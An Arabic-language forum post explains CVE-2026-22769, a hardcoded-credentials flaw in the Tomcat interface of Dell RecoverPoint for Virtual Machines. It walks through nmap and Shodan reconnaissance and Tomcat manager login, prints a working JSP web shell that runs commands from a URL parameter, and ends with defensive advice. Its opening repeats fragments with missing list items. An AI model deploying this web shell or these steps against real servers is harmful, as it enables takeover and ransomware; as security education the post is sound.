- بواسطة x32x01 ||
تم الكشف يوم 17 فبراير 2026 عن ثغرة خطيرة جدًا باسم CVE-2026-22769، وحصلت على التقييم الكامل 10/10 👀
والأخطر؟ إنها Zero-Day، يعني تم استغلالها قبل ما الشركة تصدر تحديث رسمي.
الثغرة بتستهدف نظام مهم جدًا في مراكز البيانات اسمه
Dell RecoverPoint for Virtual Machines (RP4VMs)
وده مش جهاز لاب توب أو سيرفر عادي… ده نظام نسخ احتياطي وتعافي من الكوارث (Disaster Recovery) بيحمي بيانات شركات كبيرة وبنوك ومؤسسات Enterprise 💾🏢
يعني فيه:
الثغرة موجودة في إعدادات خادم Apache Tomcat
وده السيرفر اللي بيشغل واجهة الإدارة الخاصة بالنظام.
كده الشركة ميبقاش عندها طريقة ترجع بياناتها.
لكن المهاجم مش بيبدأ بيه… هو بيوصل له بعد ما يخترق جهاز جوه الشركة.
ولو لقى صفحة عنوانها فيه كلمات زي:
أو يستخدم أدوات زي:
المهاجم ممكن يستخدم محركات زي:
ويدور على أجهزة مفتوحة على 8443 فيها بصمة RecoverPoint.
المدمجة في النظام فيها:
ويسجل دخول باستخدام البيانات المخفية.
وده نوع من تطبيقات Java.
المهاجم يرفع Web Shell بسيط زي المثال ده:
ويبدأ ينفذ أوامر.
لو السيرفر شغال بصلاحيات Root…
يبقى حصل على سيطرة مطلقة 😱
في عالم الأمن السيبراني… أكبر خطر مش دايمًا من الإنترنت.
أحيانًا بيكون جوه الشبكة نفسها.
والأخطر؟ إنها Zero-Day، يعني تم استغلالها قبل ما الشركة تصدر تحديث رسمي.
الثغرة بتستهدف نظام مهم جدًا في مراكز البيانات اسمه
Dell RecoverPoint for Virtual Machines (RP4VMs)
وده مش جهاز لاب توب أو سيرفر عادي… ده نظام نسخ احتياطي وتعافي من الكوارث (Disaster Recovery) بيحمي بيانات شركات كبيرة وبنوك ومؤسسات Enterprise 💾🏢
إيه طبيعة الثغرة بالظبط؟ 🤔
الثغرة من نوع Hardcoded Credentialsيعني فيه:
- اسم مستخدم مخفي
- كلمة مرور ثابتة
- بصلاحيات مدير (Admin)
- ومش ظاهرين في الدليل
- ومينفعش تغيرهم بسهولة
الثغرة موجودة في إعدادات خادم Apache Tomcat
وده السيرفر اللي بيشغل واجهة الإدارة الخاصة بالنظام.
ليه الثغرة دي خطيرة جدًا على الشركات؟ 🚨
لأن الأنظمة دي:- موجودة داخل مراكز بيانات
- مسؤولة عن النسخ الاحتياطية
- جزء أساسي من خطة التعافي من الكوارث
كده الشركة ميبقاش عندها طريقة ترجع بياناتها.
إزاي المهاجمين بيوصلوا للنظام ده؟ 🕵️♂️
النظام غالبًا بيكون Internal مش مفتوح على الإنترنت.لكن المهاجم مش بيبدأ بيه… هو بيوصل له بعد ما يخترق جهاز جوه الشركة.
1️⃣ البحث عن واجهة الإدارة
النظام بيشتغل على:- Port 443
- Port 8443
Code:
nmap -p 443,8443 192.168.1.0/24 - RecoverPoint
- Installation Manager
2️⃣ المسح الداخلي بعد الاختراق (Post Exploitation)
بعد ما يخترق جهاز موظف، يبدأ يعمل استكشاف: Code:
nmap -sV 192.168.1.0/24 - Advanced IP Scanner
- Netdiscover
3️⃣ ثغرات التوريد و Shodan
أحيانًا مهندس شبكة يفتح واجهة الإدارة على الإنترنت بالغلط 😬المهاجم ممكن يستخدم محركات زي:
Shodanويدور على أجهزة مفتوحة على 8443 فيها بصمة RecoverPoint.
آلية الاستغلال خطوة بخطوة 🔥
1️⃣ اكتشاف بيانات الاعتماد المخفية
المهاجم يكتشف إن نسخة Apache Tomcatالمدمجة في النظام فيها:
- مستخدم افتراضي
- كلمة مرور Hardcoded
- صلاحيات مدير كاملة
2️⃣ تسجيل الدخول
يدخل على الرابط:https://Target_IP:8443/manager/htmlويسجل دخول باستخدام البيانات المخفية.
3️⃣ رفع ملف WAR
واجهة Tomcat بتسمح برفع ملفات بصيغة:WARوده نوع من تطبيقات Java.
المهاجم يرفع Web Shell بسيط زي المثال ده:
Java:
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if(cmd != null){
String s = null;
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader stdInput = new BufferedReader(
new InputStreamReader(p.getInputStream()));
while((s = stdInput.readLine()) != null){
out.println(s);
}
}
%> 4️⃣ الحصول على سيطرة كاملة
بعد رفع الملف، يفتح:http://Target_IP:8443/shell.jsp?cmd=idويبدأ ينفذ أوامر.
لو السيرفر شغال بصلاحيات Root…
يبقى حصل على سيطرة مطلقة 😱
السيناريو الأسوأ… Ransomware 🧨
من اللحظة دي يقدر:- يمسح النسخ الاحتياطية
- يشفر البيانات
- يسرق معلومات حساسة
- يثبت أدوات تحكم دائم
إزاي تحمي نفسك من CVE-2026-22769؟ 🛡️
✅ تحديث النظام فورًا
لو Dell أصدرت Patch لازم يتثبت فورًا.✅ غلق واجهة الإدارة عن الإنترنت
متفتحش 8443 Public أبدًا.✅ تفعيل Network Segmentation
افصل أنظمة النسخ الاحتياطي عن باقي الشبكة.✅ تغيير أي بيانات افتراضية
حتى لو مش باين إنها مستخدمة.✅ مراقبة Logs
راجع أي وصول إلى:/manager/htmlليه النوع ده من الثغرات منتشر؟ 🤖
بسبب:- مكونات قديمة
- إعدادات افتراضية
- أخطاء في Secure Coding
- عدم مراجعة الإعدادات الداخلية
خلاصة الموضوع 💬
CVE-2026-22769 مش مجرد ثغرة… دي مثال حي على خطورة:- Hardcoded Credentials
- سوء تأمين أنظمة Enterprise
- الاعتماد على فكرة إن النظام Internal يبقى آمن
في عالم الأمن السيبراني… أكبر خطر مش دايمًا من الإنترنت.
أحيانًا بيكون جوه الشبكة نفسها.